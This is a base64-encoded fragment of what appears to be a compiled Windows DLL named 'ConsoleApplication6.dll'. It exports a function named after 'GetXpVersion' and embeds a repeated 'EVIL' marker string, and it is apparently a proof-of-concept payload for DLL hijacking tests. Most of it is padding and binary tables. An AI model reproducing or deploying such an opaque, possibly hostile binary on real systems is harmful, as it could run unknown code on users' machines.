AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGtz8FYAAAAAPNsBAAEAAAACAAAAAgAAACjbAQAw2wEAONsBAMsSAQCZEgEAVNsBAGvbAQAAAAEAQ29uc29sZUFwcGxpY2F0aW9uNi5kbGwAP19fR2V0WHBWZXJzaW9uQEBZQUtYWgBFVklMRVZJTEVWSUxFVklMRVZJTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAABAAAAAgAAAC8gAAAAAAAAAAAAAAAAAAAyot8tmSsAAM1dINJm1P//AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVigCAAAAAABaKgIAAAAAAEYqAgAAAAAANCoCAAAAAAAmKgIAAAAAABYqAgAAAAAABCoCAAAAAAD4KQIAAAAAAOwpAgAAAAAA3CkCAAAAAADGKQIAAAAAALApAgAAAAAAnikCAAAAAACKKQIAAAAAAG4pAgAAAAAAXCkCAAAAAAA+KQIAAAAAACIpAgAAAAAADikCAAAAAAD6KAIAAAAAAOAoAgAAAAAAzCgCAAAAAAC2KAIAAAAAAJwoAgAAAAAAhigCAAAAAABwKAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICYCAAAAAABkJgIAAAAAAHwmAgAAAAAAnCYCAAAAAAC4JgIAAAAAANImAgAAAAAAQiYCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADGJwIAAAAAAK4nAgAAAAAAkicCAAAAAAB2JwIAAAAAAFQnAgAAAAAA1CcCAAAAAAA0JwIAAAAAACgnAgAAAAAAFicCAAAAAAAGJwIAAAAAAPwmAgAAAAAA6icCAAAAAAD0JwIAAAAAAAAoAgAAAAAAHCgCAAAAAAAsKAIAAAAAADwoAgAAAAAAQicCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiCQCAAAAAAAAAAAA6iYCAFAhAgAgJQIAAAAAAAAAAABIKAIA6CECADgjAgAAAAAAAAAAAG4qAgAAIAIAAAAAAAAAAAAAAAAAAAAAAAAAAABWKAIAAAAAAFoqAgAAAAAARioCAAAAAAA0KgIAAAAAACYqAgAAAAAAFioCAAAAAAAEKgIAAAAAAPgpAgAAAAAA7CkCAAAAAADcKQIAAAAAAMYpAgAAAAAAsCkCAAAAAACeKQIAAAAAAIopAgAAAAAAbikCAAAAAABcKQIAAAAAAD4pAgAAAAAAIikCAAAAAAAOKQIAAAAAAPooAgAAAAAA4CgCAAAAAADMKAIAAAAAALYoAgAAAAAAnCgCAAAAAACGKAIAAAAAAHAoAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgJgIAAAAAAGQmAg